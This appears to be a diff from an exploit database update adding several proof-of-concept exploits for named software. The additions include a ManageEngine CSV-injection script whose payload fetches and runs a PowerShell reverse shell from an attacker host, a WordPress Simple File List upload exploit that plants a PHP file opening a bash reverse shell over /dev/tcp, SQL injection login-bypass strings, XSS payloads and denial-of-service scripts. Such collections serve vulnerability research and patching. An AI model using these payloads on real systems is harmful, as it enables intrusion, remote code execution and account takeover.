DB: 2021-05-20

8 changes to exploits/shellcodes

WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)

Visual Studio Code 1.47.1 - Denial of Service (PoC)
WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
ManageEngine ADSelfService Plus 6.1 - CSV Injection
COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)
COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)

exploits/ios/dos/49883.py

@@ -0,0 +1,23 @@
+# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
+# Author: Luis Martinez
+# Discovery Date: 2021-05-18
+# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
+# Software Link: App Store for iOS devices
+# Tested Version: 14.16.10
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 14.5.1
+
+# Steps to Produce the Crash:
+# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
+# 2.- Copy content to clipboard
+# 3.- Open "WebSSH for iOS"
+# 4.- Click -> Tools
+# 5.- Click -> mashREPL
+# 6.- Paste ClipBoard on "mashREPL>"
+# 7.- Intro
+# 8.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 300
+print (buffer)

exploits/multiple/webapps/49884.txt

@@ -0,0 +1,29 @@
+# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
+# Date: 18/05/2021
+# Exploit Author: Gulab Mondal
+# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
+# Version: In4Suite ERP 3.2.74.1370
+# Tested on: Windows
+
+-----------------------------------------
+
+SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to
+modify or delete data, causing persistent changes to the application's
+content or behavior by using malicious SQL queries.
+
+--------------
+
+
+# Error condition
+POST /CheckLogin.asp HTTP/1.1
+Host: 127.0.0.1
+
+txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "
+
+# SQL Injection exploitation
+POST /CheckLogin.asp HTTP/1.1
+Host: 127.0.0.1
+
+txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="
+
+------------------------------

exploits/multiple/webapps/49885.py

@@ -0,0 +1,61 @@
+# Exploit Title: ManageEngine ADSelfService Plus 6.1 - CSV Injection
+# Date: 19/05/2021
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/self-service-password/download.html
+# Version: 6.1
+# Description: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection
+
+
+import requests
+import sys
+import urllib3
+
+"""
+Proof of Concept:
+Step-1
+1- Malicious user sends POST request to login page https://TARGET-IP/j_security_check and sets j_username parameter as like the below.
+=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0
+Step-2
+2- The request attempt will be saved to"User Attempts Audit Report" table that is under the Reports >  Audit Reports section. Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12
+j_username parameter value  is saved  to "User Name"  column which is start of line in the CSV file. If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection 
+will be obtained by malicious user. 
+Details: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection
+"""
+
+
+def loginReq(target,payload,getCsrf):
+    s = requests.Session()
+    data = {
+        "j_username": payload,
+        "j_password": "joker",
+        "domainName": "ADSelfService+Plus+Authentication",
+        "AUTHRULE_NAME": "ADAuthenticator",
+        "adscsrf": getCsrf
+
+    }
+    url = "https://"+target+"/j_security_check"
+    req = s.post(url, data=data, allow_redirects=False, verify=False)
+    if req.status_code == 302:
+    	print("[+] Sending request is successful.")
+    	print("[+] Injected payload: %s" %payload)
+    else:
+    	print("[-] Something went wrong!")
+    	print(req.status_code)
+
+def getCsrfToken(target, payload=None):
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+    gUrl = "https://" + target + "/authorization.do"
+    getCsrf = requests.get(url=gUrl, allow_redirects=False, verify=False)
+    print("[*] Csrf token: %s" %getCsrf.cookies['_zcsr_tmp'])
+    loginReq(target,payload,getCsrf)
+
+def main(args):
+    if len(args) != 3:
+        print("usage: %s targetIp:port payload" %(args[0]))
+        print("Example: python3 adSelfServiceCsv.py 192.168.1.253:9251 \"=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0\"")
+        sys.exit(1)
+    getCsrfToken(target=args[1], payload=args[2])
+
+if __name__ == "__main__":
+    main(args=sys.argv)

exploits/php/webapps/48979.py

@@ -19,81 +19,71 @@ urllib3.disable_warnings()
 dir_path = '/wp-content/uploads/simple-file-list/'
 upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
 move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
-file_name = raw_input('[*] Enter File Name (working directory): ')
-protocol = raw_input('[*] Enter protocol (http/https): ')
-http = protocol + '://'
 
 def usage():
-    banner ="""
-USAGE: python simple-file-list-upload.py <ip-address> 
-NOTES: Append :port to IP if required.
-       Advise the usage of a webshell as payload. Reverseshell payloads can be hit or miss.
+    banner = """
+NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE
+SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL>
+AUTHOR: coiffeur
     """
-    print (banner)
-
-
-def file_select():
-    filename = file_name.split(".")[0]+'.png'
-    with open(file_name) as f:
-        with open(filename, 'w+') as f1:
-            for line in f:
-                f1.write(line)
-    print ('[+] File renamed to ' + filename)
-    return filename
+    print(banner)
 
+def generate():
+    filename = f'{random.randint(0, 10000)}.png'
+    password = hashlib.md5(bytearray(random.getrandbits(8)
+                                     for _ in range(20))).hexdigest()
+    with open(f'{filename}', 'wb') as f:
+        payload = '<?php passthru("bash -i >& /dev/tcp/192.168.1.1/4444 0>&1"); ?>'
+        f.write(payload.encode())
+    print(f'[ ] File {filename} generated with password: {password}')
+    return filename, password
 
 def upload(url, filename):
     files = {'file': (filename, open(filename, 'rb'), 'image/png')}
-    datas = {
-        'eeSFL_ID': 1,
-        'eeSFL_FileUploadDir': dir_path,
-        'eeSFL_Timestamp': 1587258885,
-        'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2',
-        }
-    r = requests.post(url=http + url + upload_path, data=datas,
-                      files=files, verify=False)
-    r = requests.get(url=http + url + dir_path + filename, verify=False)
+    datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
+             'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
+    r = requests.post(url=f'{url}{upload_path}',
+                      data=datas, files=files, verify=False)
+    r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
     if r.status_code == 200:
-        print ('[+] File uploaded at ' + http + url + dir_path + filename)
+        print(f'[ ] File uploaded at {url}{dir_path}{filename}')
         os.remove(filename)
     else:
-        print ('[-] Failed to upload ' + filename)
+        print(f'[*] Failed to upload {filename}')
         exit(-1)
     return filename
 
-
 def move(url, filename):
-    new_filename = filename.split(".")[0]+'.php'
-    headers = {'Referer': http + url + '/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
-         'X-Requested-With': 'XMLHttpRequest'}
-    datas = {
-        'eeSFL_ID': 1,
-        'eeFileOld': filename,
-        'eeListFolder': '/',
-        'eeFileAction': 'Rename|'+ new_filename,
-        }
-    r = requests.post(url= http + url + move_path, data=datas,
-                      headers=headers, verify=False)
+    new_filename = f'{filename.split(".")[0]}.php'
+    headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
+               'X-Requested-With': 'XMLHttpRequest'}
+    datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
+             'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
+    r = requests.post(url=f'{url}{move_path}',
+                      data=datas, headers=headers, verify=False)
     if r.status_code == 200:
-        print ('[+] File moved to ' + http + url + dir_path + new_filename)
+        print(f'[ ] File moved to {url}{dir_path}{new_filename}')
     else:
-        print ('[-] Failed to move ' + filename)
+        print(f'[*] Failed to move {filename}')
         exit(-1)
     return new_filename
 
-
 def main(url):
-    file_to_upload = file_select()
+    file_to_upload, password = generate()
     uploaded_file = upload(url, file_to_upload)
     moved_file = move(url, uploaded_file)
     if moved_file:
-        print ('[^-^] Exploit seems to have worked...')
-        print ('\tURL: ' + http + url + dir_path + moved_file)
+        print(f'[+] Exploit seem to work.\n[*] Confirmning ...')
+    datas = {'password': password, 'cmd': 'phpinfo();'}
+    r = requests.post(url=f'{url}{dir_path}{moved_file}',
+                      data=datas, verify=False)
+    if r.status_code == 200 and r.text.find('php') != -1:
+        print('[+] Exploit work !')
+        print(f'\tURL: {url}{dir_path}{moved_file}')
+        print(f'\tPassword: {password}')
 
-
-if __name__ == '__main__':
-    if len(sys.argv) < 2:
+if __name__ == "__main__":
+    if (len(sys.argv) < 2):
         usage()
         exit(-1)
-
     main(sys.argv[1])

exploits/php/webapps/49880.txt

@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
+# Date: 04/08/2021
+# Exploit Author: Hosein Vita
+# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
+# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
+# Version: <= 2021.8
+# Tested on: Windows-Ubuntu
+# CVE : CVE-2021-24245
+
+Summary:
+
+Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript
+
+Proof of concepts:
+
+1-Install "Stop Spammers <= 2021.8" in your wordpress website
+2-For testing remove your IP address from the allowed list
+3-Go to http://<YOUR-WEBSITE>/wp-admin
+4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "
+#Notice the `ad` keyword must be in your payload!
+5-Press Alt + Shift + X to trigger Xss
+#Tested on Firefox
+
+Request POC:
+
+POST /wp-login.php HTTP/1.1
+Host: localhost
+Connection: close
+Content-Length: 161
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: wordpress_test_cookie=WP+Cookie+check;
+
+log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1

exploits/php/webapps/49886.txt

@@ -0,0 +1,23 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)
+# Date: 19/05/2021
+# Exploit Author: Rohit Burke
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10
+
+SQL Injection:
+Injection flaws, such as SQL, NoSQL, and LDAP injection, occur when
+untrusted data is sent to an interpreter as part of a command or query. The
+attacker’s hostile data can trick the interpreter into executing unintended
+commands or accessing data without proper authorization.
+
+Attack vector:
+An attacker can gain admin panel access using malicious sql injection queries.
+
+Steps to reproduce:
+1) Open admin login page using following URl:
+"http://localhost/covid-tms/login.php"
+
+2) Now put the payload below the Username and password field.
+Payload: admin' or '1'='1 and you will be successfully logged In as Admin without any credentials.

exploits/php/webapps/49887.txt

@@ -0,0 +1,39 @@
+# Exploit Title: COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)
+# Date: 19/05/2021
+# Exploit Author: Rohit Burke
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10
+
+==> Stored Cross-Site Scripting XSS:
+An attacker uses Stored XSS to inject malicious content (referred to as
+the payload), most often JavaScript code, into the target application. If
+there is no input validation, this malicious code is permanently stored
+(persisted) by the target application, for example within a database. For
+example, an attacker may enter a malicious script into a user input field
+such as a blog comment field or in a forum post.
+When a victim opens the affected web page in a browser, the XSS attack
+payload is served to the victim’s browser as part of the HTML code (just
+like a legitimate comment would). This means that victims will end up
+executing the malicious script once the page is viewed in their browser.
+
+==> Attack Vendor:
+This vulnerability can results attacker injecting the XSS payload in the
+Admin profile section and each time admin visits the all other sections of
+the application the XSS triggers and the attacker can able to steal the
+cookie according to the crafted payload.
+
+==> Vulnerable Parameters:
+"Admin name" parameter
+
+==> Steps for reproduce:
+
+1) Go to http://localhost/covid-tms/login.php
+and logged In as an Admin (#Username: admin #Password: Test@123).
+
+2) Click on (Admin --> Profile). Enter the payload in
+Admin name = <script>alert(1337)</script> 
+Click on submit.
+
+3) Now, whichever section of the application admin visits the payload gets executed successfully.

exploits/windows/local/49882.ps1

@@ -0,0 +1,45 @@
+# Exploit Tittle: Visual Studio Code 1.47.1 - Denial of Service (Poc)
+# Exploit Author: H.H.A.Ravindu Priyankara
+# Category: Denial of Service(DOS)
+# Tested Version:1.47.1
+# Vendor: Microsoft
+# Software Download Link:https://code.visualstudio.com/updates/
+
+Write-Host "
+  *                                                                                                           *
+    *-------------------------------------------------------------------------------------------------------*
+    |                                                                                                       |
+    |" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Tittle :-" -ForegroundColor Green -NoNewline; Write-Host "  Visual Studio Code (VS Code) Denial of Service               " -ForegroundColor Cyan -NoNewline; Write-Host "                      |
+    |                                                                                                       |
+    |" -ForegroundColor Yellow -NoNewline; Write-Host " Author         :-" -ForegroundColor Green -NoNewline; Write-Host "  H.H.A.Ravindu.Priyankara  " -ForegroundColor Cyan -NoNewline; Write-Host "                                                         |
+    |                                                                                                       |
+    |" -ForegroundColor Yellow -NoNewline; Write-Host " Github         :-" -ForegroundColor Green -NoNewline; Write-Host "  https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host "                                             |
+    |                                                                                                       |
+    |" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube        :-"-ForegroundColor Green -NoNewline; Write-Host "  https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host "                          |
+    |                                                                                                       |
+    |" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin       :-"-ForegroundColor Green -NoNewline; Write-Host "  https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host "                         |
+    *-------------------------------------------------------------------------------------------------------*"-ForegroundColor Yellow 
+
+[string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-"
+if ($Userinpts -eq "Run") {
+    Write-Output "Yeah I Know"
+    while ($True) {
+        $name = "AAAAAAA"
+        $name * 1000000
+    }
+    #or
+    #$name = "AAAAAAA"
+    #$name * 1000000
+}
+if ($Userinpts -eq "Stop") {
+    exit
+}
+
+#==========================================================
+#==================== solution ============================ 
+#==========================================================
+
+#Update Your Visual Studio Code Application
+#    1.47.1 version ==> 1.56.0 version
+
+#==========================================================

files_exploits.csv

@@ -6781,6 +6781,7 @@ id,file,description,date,author,type,platform,port
 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple,
 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,
 49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows,
+49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11328,6 +11329,7 @@ id,file,description,date,author,type,platform,port
 49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free",2021-05-13,"Forrest Orr",local,windows_x86-64,
 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",2021-05-13,"Forrest Orr",local,windows_x86-64,
 49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",2021-05-17,SlidingWindow,local,windows,
+49882,exploits/windows/local/49882.ps1,"Visual Studio Code 1.47.1 - Denial of Service (PoC)",2021-05-19,"H.H.A.Ravindu Priyankara",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44045,3 +44047,8 @@ id,file,description,date,author,type,platform,port
 49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload",2021-05-17,bwnz,webapps,php,
 49878,exploits/php/webapps/49878.txt,"EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection",2021-05-18,"Dimitrios Mitakos",webapps,php,
 49879,exploits/windows/webapps/49879.py,"Microsoft Exchange 2019 - Unauthenticated Email Download",2021-05-18,"Gonzalo Villegas",webapps,windows,
+49880,exploits/php/webapps/49880.txt,"WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)",2021-05-19,"Hosein Vita",webapps,php,
+49884,exploits/multiple/webapps/49884.txt,"In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection",2021-05-19,"Gulab Mondal",webapps,multiple,
+49885,exploits/multiple/webapps/49885.py,"ManageEngine ADSelfService Plus 6.1 - CSV Injection",2021-05-19,"Metin Yunus Kandemir",webapps,multiple,
+49886,exploits/php/webapps/49886.txt,"COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)",2021-05-19,"Rohit Burke",webapps,php,
+49887,exploits/php/webapps/49887.txt,"COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)",2021-05-19,"Rohit Burke",webapps,php,